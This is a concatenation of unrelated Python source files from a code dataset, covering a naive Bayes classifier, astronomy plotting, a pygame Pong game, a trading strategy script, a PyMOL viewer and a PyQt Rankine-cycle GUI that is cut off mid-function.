textParse(feed0['entries'][i]['summary'])\n\t\tdocList.append(wordList)\n\t\tfullText.extend(wordList)\n\t\tclassList.append(0)\n\tvocabList = createVocabList(docList)\n\ttop30Words = calcMostFreq(vocabList, fullText)\n\tfor pairW in top30Words:\n\t\tif pairW[0] in vocabList: vocabList.remove(pairW[0])  # 去掉出现次数最高的那些词\n\ttrainingSet = list(range(2 * minLen))\n\ttestSet = []\n\tfor i in range(20):\n\t\trandIndex = int(np.random.uniform(0, len(trainingSet)))\n\t\ttestSet.append(trainingSet[randIndex])\n\t\tdel (trainingSet[randIndex])\n\ttrainMat = []\n\ttrainClasses = []\n\tfor docIndex in trainingSet:\n\t\ttrainMat.append(bagOfWords2VecMN(vocabList, docList[docIndex]))\n\t\ttrainClasses.append(classList[docIndex])\n\tp0V, p1V, pSpam = trainNB0(np.array(trainMat), np.array(trainClasses))\n\terrorCount = 0\n\tfor docIndex in testSet:\n\t\twordVector = bagOfWords2VecMN(vocabList, docList[docIndex])\n\t\tif classifyNB(np.array(wordVector), p0V, p1V, pSpam) != classList[docIndex]:\n\t\t\terrorCount += 1\n\tprint('the error rate is:', float(errorCount) / len(testSet))\n\treturn vocabList, p0V, p1V\n\ndef getTopWords(ny, sf):\n\timport operator\n\tvocabList, p0V, p1V = localWords(ny, sf)\n\ttopNY = []\n\ttopSF = []\n\tfor i in range(len(p0V)):\n\t\tif p0V[i] > -6.0: topSF.append((vocabList[i], p0V[i]))\n\t\tif p1V[i] > -6.0: topNY.append((vocabList[i], p1V[i]))\n\tsortedSF = sorted(topSF, key=lambda pair: pair[1], reverse=True)\n\tprint(\"SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**SF**\")\n\tfor item in sortedSF:\n\t\tprint(item[0])\n\tsortedNY = sorted(topNY, key=lambda pair: pair[1], reverse=True)\n\tprint(\"NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**NY**\")\n\tfor item in sortedNY:\n\t\tprint(item[0])\n\nif __name__ == 
'__main__':\n\ttestingNB()\n\t#spamTest()","sub_path":"ML_InAction/NavieBayes.py","file_name":"NavieBayes.py","file_ext":"py","file_size_in_byte":11969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"39951800","text":"'''\nEstimate of surface brightness erg/s/cm^2/sr for shell ACS\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom astropy.table import Table\n\ntab = Table.read(\"arcs-summary.tab\", format=\"ascii.commented_header\", delimiter=\"\\t\",\n fill_values=('-', np.nan) )\n\n# photometric keywords from the ACS header\nSfactor_ACS = 0.0025030687604156482\n\nwith open(\"problem-sources.txt\") as f:\n problem_sources = f.read().split('\\n')\nwith open(\"interproplyd.txt\") as f:\n problem_sources += f.read().split('\\n')\n\nprint(problem_sources)\nlabel = tab['Object']\nm = np.isfinite(tab['R_out']) & np.isfinite(tab['R_in']) \nm = m & np.array([not source in problem_sources for source in tab['Object']])\n\nDistance = tab['D']\nDif_Bally = tab['Dif_Bally']\n\nSBally_physical = Sfactor_ACS*Dif_Bally\n\n#print label\nfig = plt.figure()\nax1 = fig.add_subplot(1,1,1)\n#ax1.set_xlim(xmin=100,xmax=600)\n#ax1.set_ylim(ymin=0,ymax=10)\nfor x, y, s, e in zip(Distance[m], SBally_physical[m], label[m], Sfactor_ACS*tab['Delta'][m]):\n if e < y:\n ax1.plot(x,y,'bo')\n ax1.errorbar(x, y, yerr=e, c='b')\n size = 3\n else:\n ax1.plot(x,y,'r.')\n size = 2\n ax1.annotate(s, (x, y), alpha=0.5, size=size,\n xytext=(-3,3), textcoords='offset points', ha='right', va='bottom',)\n\nax1.plot(Distance, tab[\"Value_bg_Bally\"]*Sfactor_ACS, 'k.', alpha=0.4)\n\nax1.set_xlabel(r'$D$, arcsec')\nax1.set_ylabel(r'$S(\\mathrm{H\\alpha+NII})$, $\\mathrm{erg\\ s^{-1}\\ cm^{-2}\\ sr^{-1}}$')\nax1.set_xscale('log')\nax1.set_yscale('log')\n#ax1.set_title(r'fraction Difference shell y background vs D')\nax1.grid(True)\n\nfig.savefig(\"S(Ha+NII)_ACSshell.pdf\")\n","sub_path":"luis-programas/brightnes_phisical-shell.py","file_name":"brightnes_phisical-shell.py","file_ext":"py","file_size_in_byte":1667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"124857656","text":"\r\n\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 18 11:35:48 2018\r\n\r\n@author: Edison\r\n\"\"\"\r\n\r\nimport matplotlib.pyplot as plt, numpy as np\r\n\r\ndef display(array, xlabel, ylabel, title, savefig):\r\n \"\"\"Takes in an array of values and plots them sequentially in a line graph\"\"\"\r\n \r\n x = [num for num in range(len(array))]\r\n y = array\r\n plt.plot(x, y)\r\n \r\n plt.xlabel(str(xlabel))\r\n plt.ylabel(str(ylabel))\r\n plt.title(str(title))\r\n plt.grid(True)\r\n plt.savefig(str(savefig))\r\n plt.show()\r\n \r\n\r\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"386048425","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Project: QuestionFromProfWang\n# File name: sort_picture\n# Author: Mark Wang\n# Date: 27/9/2016\n\nimport os\nimport shutil\n\nimport pandas as pd\n\nFORMER_RESULT_PATH = '/Users/warn/Documents/RAForWangZG/2016.9.18/xlsx_results'\nq = 8\n\nmax_sta_df = pd.read_excel(os.path.join(FORMER_RESULT_PATH, 'max_info_statistics.xlsx'),\n sheetname='division {} (no dup)'.format(q))\n\nsource_dir = 'output_picture_8'\ndst_dir = 'sorted_picture'\n\ni = 1\n\nfor method in max_sta_df['method']:\n src = os.path.join(source_dir, 
'{}.png'.format(method))\n    dst = os.path.join(dst_dir, '{}.png'.format(i))\n    shutil.copy(src, dst)\n    i += 1\n","sub_path":"CarryTrade/spa_src_test/sort_picture.py","file_name":"sort_picture.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"324898715","text":"import pygame, os, sys\nimport data, durak;\n\nos.environ['SDL_VIDEO_WINDOW_POS'] = \"0, 30\" #Sets window position to upper left corner\n\npygame.init()\n\n# Set screen dimensions according to monitor's size\nscreen_width = pygame.display.Info().current_w\nscreen_height = pygame.display.Info().current_h\n\nscreen = pygame.display.set_mode((screen_width, screen_height), pygame.HWSURFACE)\n\npygame.display.set_icon(pygame.image.load('Resources\\icon.jpg'))\npygame.display.set_caption(data.title)\n\ndef main():\n    screen.fill(data.background_color)\n\n    player_one = durak.Player(\"Player 1\")\n    player_two = durak.Player(\"Player 2\")\n    for player in [player_one, player_two]: player.take_cards()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"575411145","text":"class Node(object):\n    def __init__(self, table, parent=None, direction=-1):\n        self.table = table\n        self.parent = parent\n        if parent is None:\n            self.depth = 0\n        else:\n            self.depth = parent.depth + 1\n\n        # How the node table was obtained from the previous table\n        self.direction = direction\n\n    def has_repeated(self):\n        # Walk up the ancestor chain; the state repeats if an ancestor holds the same table\n        current_node = self.parent\n\n        while current_node is not None:\n            if self.table == current_node.table:\n                return True\n            current_node = current_node.parent\n        return False\n","sub_path":"node.py","file_name":"node.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"523329860","text":"import sys\nfrom rsstag.routes import RSSTagRoutes\nfrom rsstag.letters import RssTagLetters\nfrom rsstag.utils import load_config\nfrom rsstag.tags import RssTagTags\nfrom pymongo import MongoClient\n\ndef make_letters(db, config):\n    router = RSSTagRoutes(config['settings']['host_name'])\n    user = db.users.find_one({})\n    letters = RssTagLetters(db)\n    tags = RssTagTags(db)\n    all_tags = tags.get_all(user['sid'], projection={'tag': True, 'unread_count': True})\n    result = False\n    if tags:\n        result = letters.sync_with_tags(user['sid'], all_tags, router)\n\n    return result\n\nif __name__ == '__main__':\n    config_path = 'rsscloud.conf'\n    if len(sys.argv) > 1:\n        config_path = sys.argv[1]\n    config = load_config(config_path)\n    cl = MongoClient(config['settings']['db_host'], int(config['settings']['db_port']))\n    db = cl[config['settings']['db_name']]\n    result = make_letters(db, config)\n    if result:\n        print('Done')\n    else:\n        print('Not done, result - ', result)\n","sub_path":"make_letters.py","file_name":"make_letters.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"66768333","text":"import pandas as pd\nimport requests\nimport time\nimport sys\n\nstrt = int(sys.argv[1])\nend = int(sys.argv[2])\n\npmcdata = pd.read_csv('PMC-ids.csv')\npmcid_full= pmcdata['PMCID']\ndata_type = 'PMC'\npmcid = pmcdata['PMCID'].str[3:]\n\npmcid_list = pmcid[strt:end]\n\nurl_1 = 'https://eutils.ncbi.nlm.nih.gov/entrez/eutils/efetch.fcgi?db=pmc&id='\n#url_2 = 
'&tool=my_tool&email=my_email@example.com'\nfull_url = url_1+pmcid_list\n#+url_2\n\nfor i in full_url.index.values:\n response = requests.get(full_url[i])\n with open(data_type+pmcid_list[i]+'.xml', 'wb') as file:\n file.write(response.content)\n file.close()\n time.sleep(1.5)\n","sub_path":"pmc_xml_download_argv.py","file_name":"pmc_xml_download_argv.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"592463240","text":"# -*- coding: utf-8 -*-\n\nfrom PyQt4 import QtGui\n\nimport os\n\nfrom geopicardie.utils.plugin_globals import GpicGlobals\n\n\nclass AboutBox(QtGui.QDialog):\n \"\"\"\n About box of the plugin\n \"\"\"\n\n def __init__(self, parent=None):\n\n QtGui.QWidget.__init__(self, parent)\n\n mainLayout = QtGui.QVBoxLayout()\n\n logo_file_path = GpicGlobals.Instance().geopic_logo_file_path\n self.logo = QtGui.QLabel()\n self.logo.setPixmap(QtGui.QPixmap(logo_file_path))\n mainLayout.addWidget(self.logo)\n\n\n title = u\"À propos de l'extension GéoPicardie…\"\n description = u\"\"\"Extension pour QGIS donnant un accès simplifié aux ressources géographiques utiles aux partenaires de GéoPicardie\nVersion {0}\nPlus d'informations à l'adresse suivante : {1}\n \"\"\".format(GpicGlobals.Instance().PLUGIN_VERSION,\n GpicGlobals.Instance().PLUGIN_SOURCE_REPOSITORY)\n\n self.textArea = QtGui.QTextEdit()\n self.textArea.setReadOnly(True)\n self.textArea.setText(description)\n self.textArea.setFrameShape(QtGui.QFrame.NoFrame)\n mainLayout.addWidget(self.textArea)\n\n self.setModal(True)\n self.setSizeGripEnabled(False)\n\n self.setLayout(mainLayout)\n\n self.setFixedSize(400, 250)\n self.setWindowTitle(title)","sub_path":"plugin/geopicardie/gui/about_box.py","file_name":"about_box.py","file_ext":"py","file_size_in_byte":1226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"431750042","text":"import os\n\nfrom dagster import check\n\nfrom .config_type import ConfigIntInstance, ConfigStringInstance, ScalarUnion\nfrom .field_utils import Selector\n\n\nclass StringSourceType(ScalarUnion):\n def __init__(self):\n super(StringSourceType, self).__init__(\n scalar_type=ConfigStringInstance,\n non_scalar_type=Selector({'env': str}),\n _key='StringSourceType',\n )\n\n def post_process(self, value):\n if not isinstance(value, dict):\n return value\n\n key, cfg = list(value.items())[0]\n if key == 'env':\n value = os.getenv(cfg)\n check.invariant(\n value is not None, 'Environment variable \"{var}\" is not set.'.format(var=cfg)\n )\n return value\n else:\n check.failed('Invalid source selector key')\n\n\nclass IntSourceType(ScalarUnion):\n def __init__(self):\n super(IntSourceType, self).__init__(\n scalar_type=ConfigIntInstance,\n non_scalar_type=Selector({'env': str}),\n _key='IntSourceType',\n )\n\n def post_process(self, value):\n if not isinstance(value, dict):\n return value\n\n key, cfg = list(value.items())[0]\n if key == 'env':\n value = os.getenv(cfg)\n check.invariant(\n value is not None, 'Environment variable \"{var}\" is not set.'.format(var=cfg)\n )\n return int(value)\n else:\n check.failed('Invalid source selector key')\n\n\nStringSource = StringSourceType()\nIntSource = IntSourceType()\n","sub_path":"python_modules/dagster/dagster/config/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} 
+{"seq_id":"346667566","text":"\"\"\"\nGatech OMSCS CS 7646\nAutumn 2018\nHomework Assignment - Manual Strategy\nHaohao Wang (hwang404)\n\"\"\"\nfrom util import get_data\nimport pandas as pd\nimport datetime as dt\nimport numpy as np\nfrom marketsimcode import compute_portvals\nimport matplotlib.pyplot as plt\nimport indicators\n\ndef testPolicy(symbol=[\"JPM\"], sd=dt.datetime(2010,1,1), ed=dt.datetime(2011,12,31), sv=100000):\n prices = get_data(['JPM'], pd.date_range(sd, ed), addSPY=True, colname = 'Adj Close')\n\n # mean_5 = indicators.mean_2(prices)\n # mean_5 = mean_5[19:]\n orders = pd.DataFrame().reindex_like(prices)\n orders = orders.rename(index=str, columns={\"SPY\":\"Position\", \"JPM\":\"Symbol\"})\n orders['Symbol'] = 'JPM'\n orders['Shares'] = 0\n orders['Position'] = 0\n orders['Order'] = 'HOLD'\n orders.index.name = 'Date'\n orders.index = pd.to_datetime(orders.index, format=\"%Y/%m/%d\")\n\n # # SMA\n # sma_20 = indicators.sma(prices, 20)\n # sma_5 = indicators.sma(prices, 5)\n # for date, row in orders.iloc[2:, :].iterrows():\n # stock = row['Symbol']\n # i = orders.index.get_loc(date)\n # p0 = prices.iloc[i, 1]\n # sma_5_1 = sma_5.iloc[i-1, 1]\n # sma_20_1 = sma_20.iloc[i-1, 1]\n # sma_5_2 = sma_5.iloc[i-2, 1]\n # sma_20_2 = sma_20.iloc[i-2, 1]\n # current = row['Position']\n # if sma_5_1 < sma_20_1 and sma_5_2 > sma_20_2: # buy\n # target = min(1000, sv // p0 + current)\n # orders.loc[date, 'Shares'] = target - current\n # orders.loc[date, 'Position'] = target\n # orders.loc[date, 'Order'] = 'BUY'\n # sv -= (target - current) * p0\n # elif sma_5_1 > sma_20_1 and sma_5_2 < sma_20_2:\n # target = min(1000, sv // p0 + current)\n # orders.loc[date, 'Shares'] = target - current\n # orders.loc[date, 'Position'] = -target\n # orders.loc[date, 'Order'] = 'SELL'\n # sv += (target - current) * p0\n # else:\n # orders.loc[date, 'Shares'] = 0\n # orders.loc[date, 'Position'] = current\n # orders.loc[date, 'Order'] = 'HOLD'\n #SMA\n sma = indicators.sma(prices, 10)\n for date, row in orders.iloc[2:, :].iterrows():\n stock = row['Symbol']\n i = orders.index.get_loc(date)\n p0 = prices.iloc[i, 1]\n p1 = prices.iloc[i-1, 1]\n ma1 = sma.iloc[i-1, 1]\n p2 = prices.iloc[i-2, 1]\n ma2 = sma.iloc[i-2, 1]\n current = row['Position']\n if p1 < ma1 * 0.95: # buy\n target = min(1000, sv // p0 + current)\n orders.loc[date, 'Shares'] = target - current\n orders.loc[date, 'Position'] = target\n orders.loc[date, 'Order'] = 'BUY'\n sv -= (target - current) * p0\n elif p1 > ma1 * 1.05:\n target = min(1000, sv // p0 + current)\n orders.loc[date, 'Shares'] = target - current\n orders.loc[date, 'Position'] = -target\n orders.loc[date, 'Order'] = 'SELL'\n sv += (target - current) * p0\n else:\n orders.loc[date, 'Shares'] = 0\n orders.loc[date, 'Position'] = current\n orders.loc[date, 'Order'] = 'HOLD'\n return orders\n\ndef getBenchmark(sd, ed, shares=1000, symbol='JPM'):\n benchmark = get_data([symbol], pd.date_range(sd, ed))\n benchmark = benchmark[symbol] * shares + 100000 - benchmark.iloc[0, 1] * 1000\n return benchmark\n\nif __name__ == '__main__':\n start_date = dt.datetime(2010,1,1)\n end_date = dt.datetime(2011,12,31)\n starting_value = 100000\n orders = testPolicy(symbol=[\"JPM\"], sd=start_date, ed=end_date, sv=starting_value)\n benchmark = ml.getBenchmark(shares=1000, sd=start_date, ed=end_date, symbol=['JPM'])\n benchmark = benchmark / benchmark.iloc[0]\n manual_str = compute_portvals(orders, start_val = starting_value, commission=9.95, impact=0.005)\n manual_str = manual_str / 
manual_str.iloc[0]\n ax = benchmark.plot(x=None, y='JPM', color='blue')\n ax = manual_str.plot(y='PortVal', ax=ax, color='black')\n ymin, ymax = ax.get_ylim()\n ax.vlines(x=orders[orders['Order'] == 'BUY'].index, ymin=ymin, ymax=ymax, color='g', lw=0.2)\n ax.vlines(x=orders[orders['Order'] == 'SELL'].index, ymin=ymin, ymax=ymax, color='r', lw=0.2)\n ax.legend([\"Benchmark\", \"Manual Strategy\"])\n plt.show()\n","sub_path":"strategy_learner/ManualStrategy.py","file_name":"ManualStrategy.py","file_ext":"py","file_size_in_byte":4346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"148479954","text":"#Pong game\n#this game is for the user who can press \"q\" button on the keyboard to move up\n#the paddle on the left or press \"a\" button to move down.\n#press \"p\" can move the right paddle up, and press \"l\" to move the right paddle \n#down. when weither side of the score hits 11, game over. \n\nimport pygame, sys, time\nfrom pygame.locals import *\n\n# User-defined classes\n\n# User-defined functions\n\ndef main():\n\n # Initialize pygame\n pygame.init()\n pygame.font.init()\n\n surfaceSize = (500, 400)\n windowTitle = 'Pong'\n frameDelay = 0.02\n\n surface = pygame.display.set_mode(surfaceSize, 0, 0)\n pygame.display.set_caption(windowTitle)\n\n # creat two paddles and one circle.\n gameOver = False\n paddle1 = [50,160,10,50]\n paddle2 = [440,160,10,50]\n ballRadius = 5\n ballCenter = [250, 200]\n ballSpeed = [10,4]\n score = [0, 0]\n\n pygame.display.update()\n\n while True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n #quit game\n if max(score)<11:\n moveBall(ballCenter, ballSpeed, ballRadius, score, surface)\n movePaddle(paddle1, paddle2)\n collision(ballCenter, ballSpeed, paddle1, paddle2,surface) \n gameOver = update(ballCenter, ballRadius, paddle1, paddle2, score, surface)\n \n pygame.display.update()\n\n time.sleep(frameDelay)\n\ndef update(ballCenter, ballRadius, paddle1, paddle2, score, surface):\n\n surface.fill(pygame.Color('black'))\n pygame.draw.circle(surface, pygame.Color('white'), ballCenter, ballRadius , 0)\n pygame.draw.rect(surface, pygame.Color('white'), paddle1, 0)\n pygame.draw.rect(surface, pygame.Color('white'), paddle2, 0)\n tempsurface=pygame.font.SysFont(None,72).render(str(score[0]), 1, pygame.Color('white'))\n surface.blit(tempsurface, (0, 0), None, 0)\n tempsurface=pygame.font.SysFont(None,72).render(str(score[1]), 1, pygame.Color('white'))\n tempsize = tempsurface.get_size()\n size = surface.get_size()\n surface.blit(tempsurface, (size[0]-tempsize[0], 0), None, 0)\n \n return False\n\ndef moveBall(ballCenter, ballSpeed, ballRadius, score, surface):\n size = surface.get_size()\n for coord in range(0,2):\n ballCenter[coord] = ballCenter[coord] + ballSpeed[coord]\n if ballCenter[coord] < ballRadius:\n #change the ball direction\n ballSpeed[coord] = -ballSpeed[coord]\n #add score\n score[1]+=abs(coord-1)\n if ballCenter[coord] + ballRadius > size[coord]:\n ballSpeed[coord] = -ballSpeed[coord]\n score[0]+=abs(coord-1)\n\ndef movePaddle(paddle1, paddle2):\n keys = pygame.key.get_pressed()\n paddle1[1]=max(0,paddle1[1]-10*keys[K_q])\n #the top of the left paddle's y-coordinate is 0\n paddle1[1]=min(400-paddle1[3],paddle1[1]+10*keys[K_a])\n #the bottom of the left paddle's y-coordinate is 400-50=350\n paddle2[1]=max(0,paddle2[1]-10*keys[K_p])\n #the top of the right paddle's y-coordinate is 0\n paddle2[1]=min(400-paddle2[3],paddle2[1]+10*keys[K_l])\n #the top of the 
right paddle's y-coordinate is 400-50=350, but the \n #x-coordinate is different to the left paddle's.\n \ndef collision(ballCenter, ballSpeed, paddle1, paddle2,surface):\n #set paddle=draw the two paddles.\n paddle1=pygame.draw.rect(surface, pygame.Color('white'), paddle1, 0)\n paddle2=pygame.draw.rect(surface, pygame.Color('white'), paddle2, 0) \n if paddle1.collidepoint(ballCenter):\n if ballSpeed[0]<0:\n #change the direction of the ball's speed\n ballSpeed[0]= -ballSpeed[0] \n \n if paddle2.collidepoint(ballCenter):\n if ballSpeed[0]>0:\n #change the direction of the ball's speed\n ballSpeed[0]= -ballSpeed[0]\n\nmain()","sub_path":"pong/pong final.py","file_name":"pong final.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"439919792","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n''' Align a list of molecules using `super` command in PyMol. The first item \n in the list is considered as the reference. \n'''\n\nimport pymolPy3\nimport pyrotein as pr\nimport os\nimport colorsimple as cs\nfrom loaddata import load_xlsx\n\n# Specify chains to process...\nfl_chain = \"chains.comp.xlsx\"\nlines = load_xlsx(fl_chain)\ndrc = \"pdb\"\n\n# Define atoms used for distance matrix analysis...\npeptide = [\"N\", \"CA\", \"C\", \"O\"]\n\n# Specify the range of atoms from rhodopsin...\nnterm = 1\ncterm = 348\nlen_atoms_peptide = (cterm - nterm + 1) * len(peptide)\n\n# Start pymol\npm = pymolPy3.pymolPy3()\n## pm(\"bg white\")\n\n# Get the color palette...\ncolor_items = [ i[4] for i in lines ]\nspe = { i : 0 for i in color_items }.keys()\ncolor_dict = cs.color_species(spe, hexsym = '0x')\n\n# Go through each mobile\nfor line in lines:\n # Unpack parameters\n _, pdb, chain, _, chrome = line[:5]\n\n # Load a mobile structure...\n entry = f\"{pdb}_{chain}.align\"\n pdb_path = os.path.join(drc, f\"{entry}.pdb\")\n pm(f\"load {pdb_path}\")\n\n # Show cartoon and custom it...\n pm(f\"show cartoon, %{entry}\")\n pm(f\"set cartoon_color, {color_dict[chrome]}, %{entry}\")\n\n # Set ribbon color...\n pm(f\"set ribbon_color, {color_dict[chrome]}, %{entry}\")\n\n\n# Customization\n\n# Set view...\npm(\"set_view (\\\\\")\npm(\" 0.796704233 , -0.603343129, 0.035119072,\\\\\")\npm(\" -0.342249423 , -0.402523756, 0.849020958,\\\\\")\npm(\" -0.498112202 , -0.688440979, -0.527183950,\\\\\")\npm(\" -0.000300951 , -0.000151135, -243.658477783,\\\\\")\npm(\" 58.718177795 , 8.645618439, -0.894862056,\\\\\")\npm(\" -1408.164916992, 1895.492553711, -20.000000000 )\")\n\n## # Set the lighting...\n## pm(\"set ambient , 0.05\")\n## pm(\"set direct , 0.2\" )\n## pm(\"set spec_direct , 0\" )\n## pm(\"set shininess , 10.\" )\n## pm(\"set reflect , 0.38\" )\n## pm(\"set spec_count , -1\" )\n## pm(\"set spec_reflect , -1.\" )\n## pm(\"set specular , 1\" )\n## pm(\"set specular_intensity, 0.5\" )\n\n# Hide the non-rhodopsin region...\npm(f\"hide cartoon, (not resi {nterm}-{cterm})\")\npm(f\"hide ribbon, (not resi {nterm}-{cterm})\")\n\n# Hide retinal...\npm(f\"hide everything, resn ret\")\n\n# Export...\ninput(\"Press Enter to exit...\")\n## pm(\"ray 1497, 1600, async=1\")\n## pm(\"draw 4491, 6400\")\n## pm(\"png align.view.png\")\n","sub_path":"examples/view.species.py","file_name":"view.species.py","file_ext":"py","file_size_in_byte":2398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"613666241","text":"from Rankine_GUI import Ui_Form\nfrom PyQt5 import 
uic\nimport sys\nfrom PyQt5 import QtWidgets as qtw\nfrom Rankine import rankine, rankineCycleController, rankineCycleView\nfrom Steam import *\n\n# these imports are necessary for draw Problem 2 is essentially just rearrangining a matplot lib graph on my GUI\n# no simple widget for this exists in QT Designer, so I have to add the widget in code.\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg\nfrom matplotlib.figure import Figure\n\n\nclass MainWindow(qtw.QWidget, Ui_Form):\n def __init__(self):\n \"\"\"MainWindow constructor\"\"\"\n super().__init__()\n self.setupUi(self)\n\n # Main UI code goes here\n self.le_TurbineInletCondition.setEnabled(False)\n self.calculated = False\n # creating a canvas to draw a figure for the rankine cycle\n self.figure = Figure(figsize=(3, 8), tight_layout=True, frameon=True, facecolor='none')\n self.canvas = FigureCanvasQTAgg(self.figure)\n self.ax = self.figure.add_subplot()\n self.main_VerticalLayout.addWidget(self.canvas)\n\n # setting up some signals and slots\n self.le_PHigh.editingFinished.connect(self.setPHigh) # triggered by hitting enter or leaving the line edit\n self.le_PLow.editingFinished.connect(self.setPLow) # triggered by hitting enter or leaving the line edit\n self.le_TurbineEff.editingFinished.connect(self.checkTurbineEffRange)\n self.rdo_Quality.toggled.connect(self.setQualityOrTHigh) # triggered when the state of the radio button changes\n self.btn_Calculate.clicked.connect(self.calcRankine)\n self.cmb_Abcissa.currentIndexChanged.connect(self.doPlot)\n self.cmb_Ordinate.currentIndexChanged.connect(self.doPlot)\n self.chk_LogAbcissa.stateChanged.connect(self.doPlot)\n self.chk_LogOrdinate.stateChanged.connect(self.doPlot)\n # End main ui code\n\n # create a rankine object to work with later\n self.RC = rankine()\n self.Controller = rankineCycleController()\n self.View = rankineCycleView()\n\n self.Controller.set(8, 8000, name='Default Rankine Cycle')\n self.Controller.buildVaporDomeData()\n # create a steam object to help with retrieving saturated properties\n self.WorkingFluid = steam(8000, x=1.0)\n\n self.satPHigh = satProps()\n self.satPLow = satProps()\n # call the functions to set the saturation properties during construction of this class\n self.setPHigh()\n self.setPLow()\n\n # show the form\n self.show()\n\n def clamp(self, val, low, high):\n if self.isfloat(val):\n val = float(val)\n if val > high:\n return float(high)\n if val < low:\n return float(low)\n return val\n return float(low)\n\n def isfloat(self, value):\n '''\n This function is a check to verify that a string can be converted to a float\n :return:\n '''\n if value == 'NaN': return False\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def setPHigh(self):\n # make sure it is a number\n ph = self.le_PHigh.text()\n if not self.isfloat(ph):\n ph = '80'\n self.le_PHigh.setText(ph)\n\n PHigh = float(ph) # convert text to number\n self.satPHigh = self.WorkingFluid.getSatProp(P_Bar=PHigh)\n self.TSatHigh = self.satPHigh.Tsat\n st_high = 'PSat = {:0.2f} bar, TSat = {:0.2f} C'.format(PHigh, self.satPHigh.Psat)\n st_high += '\\nhf = {:0.2f} kJ/kg, hg = {:0.2f} kJ/kg'.format(self.satPHigh.hf, self.satPHigh.hg)\n st_high += '\\nsf = {:0.2f} kJ/kg*K, sg = {:0.2f} kJ/kg*k'.format(self.satPHigh.sf, self.satPHigh.sg)\n st_high += '\\nvf = {:0.4f} m^3/kg, vg = {:0.2f} m^3/kg'.format(self.satPHigh.vf, self.satPHigh.vg)\n self.lbl_SatPropHigh.setText(st_high)\n\n def setPLow(self):\n # make sure it is a number\n pl = self.le_PLow.text()\n if 
not self.isfloat(pl):\n pl = '0.08'\n self.le_PLow.setText(pl)\n\n PLow = float(self.le_PLow.text()) # convert text to number\n self.satPLow = self.WorkingFluid.getSatProp(P_Bar=PLow)\n # (Tsat, hf, hg, sf, sg, vf, vg)\n st_low = 'PSat = {:0.2f} bar, TSat = {:0.2f} C'.format(PLow, self.satPLow.Tsat)\n st_low += '\\nhf = {:0.2f} kJ/kg, hg = {:0.2f} kJ/kg'.format(self.satPLow.hf, self.satPLow.hg)\n st_low += '\\nsf = {:0.2f} kJ/kg*K, sg = {:0.2f} kJ/kg*k'.format(self.satPLow.sf, self.satPLow.sg)\n st_low += '\\nvf = {:0.4f} m^3/kg, vg = {:0.2f} m^3/kg'.format(self.satPLow.vf, self.satPLow.vg)\n self.lbl_SatPropLow.setText(st_low)\n\n def checkTurbineEffRange(self):\n '''\n Makes sure turbine efficiency is in the range from 0 to 1\n :return:\n '''\n e = self.clamp(self.le_TurbineEff.text(), 0.0, 1.0)\n self.le_TurbineEff.setText(str(e))\n\n def setQualityOrTHigh(self):\n TF = self.rdo_Quality.isChecked()\n if TF:\n self.lbl_TurbineInletCondition.setText('Turbine Inlet: x=')\n self.le_TurbineInletCondition.setText(str(1.0))\n self.le_TurbineInletCondition.setEnabled(False)\n else:\n self.lbl_TurbineInletCondition.setText('Turbine Inlet: T High =')\n self.le_TurbineInletCondition.setText('{:0.2f}'.format(self.TSatHigh + 1))\n self.le_TurbineInletCondition.setEnabled(True)\n\n def doPlot(self):\n self.ax.clear()\n X = self.cmb_Abcissa.currentText()\n Y = self.cmb_Ordinate.currentText()\n logx = self.chk_LogAbcissa.isChecked()\n logy = self.chk_LogOrdinate.isChecked()\n self.Controller.plot_cycle_XY(X=X, Y=Y, ax=self.ax, logx=logx, logy=logy)\n self.canvas.draw()\n\n def calcRankine(self):\n '''\n This is called when the calculate button is clicked\n :return: nothing\n '''\n # read the high and low pressure isobar values. no range checking.\n PHigh = float(self.le_PHigh.text())\n PLow = float(self.le_PLow.text())\n\n # create a new rankine object with values depending on which radio buttton checked\n if (self.rdo_Quality.isChecked()):\n self.Controller.set(p_low=PLow * 100, p_high=PHigh * 100, eff_turbine=float(self.le_TurbineEff.text()))\n else:\n self.Controller.set(p_low=PLow * 100, p_high=PHigh * 100, eff_turbine=float(self.le_TurbineEff.text()),\n t_high=float(self.le_TurbineInletCondition.text()))\n # calculate the cycle efficiency (and states 1,2,3,4)\n self.Controller.calc_efficiency()\n\n # fill out the enthalpy values\n self.le_H1.setText('{:0.2f}'.format(self.Controller.state1.h))\n 